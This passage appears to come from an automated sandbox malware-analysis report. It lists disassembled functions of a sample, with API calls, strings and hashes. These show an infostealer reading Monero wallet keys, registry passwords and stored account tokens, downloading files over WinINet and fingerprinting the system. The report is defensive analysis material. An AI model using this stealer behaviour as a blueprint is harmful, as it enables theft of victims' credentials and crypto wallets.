                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                          • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                          • API String ID: 3478931302-218353709
                          • Opcode ID: df779f56f1a66327504d34cc3f2cc079143c4a0372ef39ca8c930c8ec1502322
                          • Instruction ID: b1da198a7c2aac23f9b128bfc0443d6180a96ecd65c1212d78d558f4d46db6a4
                          • Opcode Fuzzy Hash: df779f56f1a66327504d34cc3f2cc079143c4a0372ef39ca8c930c8ec1502322
                          • Instruction Fuzzy Hash: 705159B1D5052957CB55FB60EC92FED733EAF54300F40459CB60A62082EE746B89CFAA
                          Function 006175D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 006172D0: memset.MSVCRT ref: 00617314
                            • Part of subcall function 006172D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0061733A
                            • Part of subcall function 006172D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006173B1
                            • Part of subcall function 006172D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0061740D
                            • Part of subcall function 006172D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00617452
                            • Part of subcall function 006172D0: HeapFree.KERNEL32(00000000), ref: 00617459
                          • lstrcat.KERNEL32(00000000,006317FC), ref: 00617606
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00617648
                          • lstrcat.KERNEL32(00000000, : ), ref: 0061765A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0061768F
                          • lstrcat.KERNEL32(00000000,00631804), ref: 006176A0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 006176D3
                          • lstrcat.KERNEL32(00000000,00631808), ref: 006176ED
                          • task.LIBCPMTD ref: 006176FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                          • String ID: :
                          • API String ID: 3191641157-3653984579
                          • Opcode ID: 3e02378609bc16e0b5d0eb61271acef22b390dfe98c58d665de0bbb154a968f3
                          • Instruction ID: b7a14c5fb3195f888bdfb38527863782e565f213b3efcd0791551a4b26965461
                          • Opcode Fuzzy Hash: 3e02378609bc16e0b5d0eb61271acef22b390dfe98c58d665de0bbb154a968f3
                          • Instruction Fuzzy Hash: DA314572900209EFCB48EBF4DC96DFF77BABB54302F184118F102A7150DA38A986CB95
                          Function 006172D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00617314
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0061733A
                          • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006173B1
                          • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0061740D
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00617452
                          • HeapFree.KERNEL32(00000000), ref: 00617459
                          • task.LIBCPMTD ref: 00617555
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeOpenProcessValuememsettask
                          • String ID: Password
                          • API String ID: 2808661185-3434357891
                          • Opcode ID: 146ad454b5422c95d7177e5dcfa780b126ce4a59dd4064a66ed5ba66be2f1262
                          • Instruction ID: e3d60dca97d9b864a8f76ea3a7627dd512c42b65782a29d01ea653571298313f
                          • Opcode Fuzzy Hash: 146ad454b5422c95d7177e5dcfa780b126ce4a59dd4064a66ed5ba66be2f1262
                          • Instruction Fuzzy Hash: 58612AB580426C9BDB24DB50CC51BD9B7B9BF48300F0481E9E689A6241EF746BC9CFA4
                          Function 00628100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0111E0E0,00000000,?,00630E2C,00000000,?,00000000), ref: 00628130
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00628137
                          • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00628158
                          • __aulldiv.LIBCMT ref: 00628172
                          • __aulldiv.LIBCMT ref: 00628180
                          • wsprintfA.USER32 ref: 006281AC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB$@
                          • API String ID: 2774356765-3474575989
                          • Opcode ID: fba0dcf1efcaa87842a644839b7be4f1df8a3b8ab3376d9c9e8b643638f9342b
                          • Instruction ID: 4f7b030446f2db86d9b4aef1193f157752b44604807111064fcb09d09f50ad36
                          • Opcode Fuzzy Hash: fba0dcf1efcaa87842a644839b7be4f1df8a3b8ab3376d9c9e8b643638f9342b
                          • Instruction Fuzzy Hash: FA213BB1E44718ABDB04DFD4DC4AFAEB7B9FB44B01F204219F605BB280C77869018BA5
                          Function 006160A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0062A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0062A7E6
                            • Part of subcall function 006147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00614839
                            • Part of subcall function 006147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00614849
                          • InternetOpenA.WININET(00630DF7,00000001,00000000,00000000,00000000), ref: 0061610F
                          • StrCmpCA.SHLWAPI(?,0111E858), ref: 00616147
                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0061618F
                          • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 006161B3
                          • InternetReadFile.WININET(?,?,00000400,?), ref: 006161DC
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0061620A
                          • CloseHandle.KERNEL32(?,?,00000400), ref: 00616249
                          • InternetCloseHandle.WININET(?), ref: 00616253
                          • InternetCloseHandle.WININET(00000000), ref: 00616260
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                          • String ID:
                          • API String ID: 2507841554-0
                          • Opcode ID: 24eb32c1b665959e34a1c4ffca3fee8b656c8c640bd7dffca347e02eb2e01c22
                          • Instruction ID: 8e921aff2de7d59f7fe509e0f8e4132f7f1a06aee8925919792ddc59369431b9
                          • Opcode Fuzzy Hash: 24eb32c1b665959e34a1c4ffca3fee8b656c8c640bd7dffca347e02eb2e01c22
                          • Instruction Fuzzy Hash: D45141B5900218ABDB24DFA0DC45BEE77BAFB48701F108198F605A71C1DBB46B85CF95
                          Function 0061BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                            • Part of subcall function 0062A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0062A7E6
                          • lstrlen.KERNEL32(00000000), ref: 0061BC9F
                            • Part of subcall function 00628E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00628E52
                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 0061BCCD
                          • lstrlen.KERNEL32(00000000), ref: 0061BDA5
                          • lstrlen.KERNEL32(00000000), ref: 0061BDB9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                          • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                          • API String ID: 3073930149-1079375795
                          • Opcode ID: 00dc0699e6dff8987cec83bb24dd68f7ee625ff1b42f3e5e7929ea128f3b9af4
                          • Instruction ID: c71bbb66fd0487c6e6b7cd932c49e980bf9778f6cc57ccfa8e2c927f1354c8de
                          • Opcode Fuzzy Hash: 00dc0699e6dff8987cec83bb24dd68f7ee625ff1b42f3e5e7929ea128f3b9af4
                          • Instruction Fuzzy Hash: F7B170719105189BDB48FBE0EC96EEE733ABF14300F44411CF506A6091EF786A49CFAA
                          Function 00626770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess$DefaultLangUser
                          • String ID: *
                          • API String ID: 1494266314-163128923
                          • Opcode ID: 6906ce3a6e6ff6f3c9e93a31d14b49c6b48b6aec5082a3271972b3d36050900c
                          • Instruction ID: aa1d5e312c54ff73e0d6cc7df8e3fa0abcd03d59348e38e2c8bef226ec68bf53
                          • Opcode Fuzzy Hash: 6906ce3a6e6ff6f3c9e93a31d14b49c6b48b6aec5082a3271972b3d36050900c
                          • Instruction Fuzzy Hash: FCF0583090831DEFD348AFE0E949B6CBF70FB08707F040298F64986390EA784B419B96
                          Function 00614FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00614FCA
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00614FD1
                          • InternetOpenA.WININET(00630DDF,00000000,00000000,00000000,00000000), ref: 00614FEA
                          • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00615011
                          • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00615041
                          • InternetCloseHandle.WININET(?), ref: 006150B9
                          • InternetCloseHandle.WININET(?), ref: 006150C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                          • String ID:
                          • API String ID: 3066467675-0
                          • Opcode ID: f52f2c071e992d4376198f2c893236f189420952209a8855e638c2c05293bfd6
                          • Instruction ID: 521efd41b13d2b61b14c5e3f96d9e3dafd804cc74c6f03788bd7dfd4ed114dc3
                          • Opcode Fuzzy Hash: f52f2c071e992d4376198f2c893236f189420952209a8855e638c2c05293bfd6
                          • Instruction Fuzzy Hash: 7A3106B4A00218EBDB24CF94DC85BDCBBB5FB48705F1081D8EA09A7280C7746AC58F99
                          Function 006283DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                          Download Yara Rule
                          APIs
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00628426
                          • wsprintfA.USER32 ref: 00628459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0062847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0062848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00628499
                            • Part of subcall function 0062A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0062A7E6
                          • RegQueryValueExA.ADVAPI32(00000000,0111E020,00000000,000F003F,?,00000400), ref: 006284EC
                          • lstrlen.KERNEL32(?), ref: 00628501
                          • RegQueryValueExA.ADVAPI32(00000000,0111DED0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00630B34), ref: 00628599
                          • RegCloseKey.ADVAPI32(00000000), ref: 00628608
                          • RegCloseKey.ADVAPI32(00000000), ref: 0062861A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                          • String ID: %s\%s
                          • API String ID: 3896182533-4073750446
                          • Opcode ID: 624db7ee16f7af8360770763df3e445d1742393f2362296340c20a45811e2d60
                          • Instruction ID: 0d96a200b5d109c18f99162a8af5eadc1527e7445b11b8ecdebb933a7b17aeb3
                          • Opcode Fuzzy Hash: 624db7ee16f7af8360770763df3e445d1742393f2362296340c20a45811e2d60
                          • Instruction Fuzzy Hash: EC210A7191022C9FDB24DB54DC85FE9B7B9FB48701F00C198E60996240DF75AA85CFD4
                          Function 00627690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006276A4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 006276AB
                          • RegOpenKeyExA.ADVAPI32(80000002,0110BF30,00000000,00020119,00000000), ref: 006276DD
                          • RegQueryValueExA.ADVAPI32(00000000,0111DE88,00000000,00000000,?,000000FF), ref: 006276FE
                          • RegCloseKey.ADVAPI32(00000000), ref: 00627708
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
